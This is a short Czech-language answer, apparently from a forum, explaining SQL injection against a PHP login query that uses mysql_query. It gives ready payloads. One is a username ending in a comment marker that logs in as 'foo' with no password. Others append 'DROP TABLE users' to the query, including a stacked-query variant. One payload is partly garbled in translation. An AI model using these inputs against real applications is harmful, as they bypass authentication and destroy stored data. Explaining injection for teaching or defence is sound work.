Něco takového by mělo fungovat:
- Chcete-li se přihlásit jako uživatel "foo", nastavte uživatelské jméno na "foo" -- "
Váš dotaz tak bude vypadat jako
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
"-- " znamená, že zbytek řádku je zakomentován
- Nejsem si jistý, jestli to bude fungovat, ale zkuste nastavit uživatelské jméno na "foo" OR (uživatelé DROP TABLE) -- "
Váš dotaz bude vypadat takto:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
nemusí to však akceptovat - myslím, že poddotazy mohou pouze SELECT.
Funkce mysql_query spustí pouze jeden dotaz – ostatní vám to umožní:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");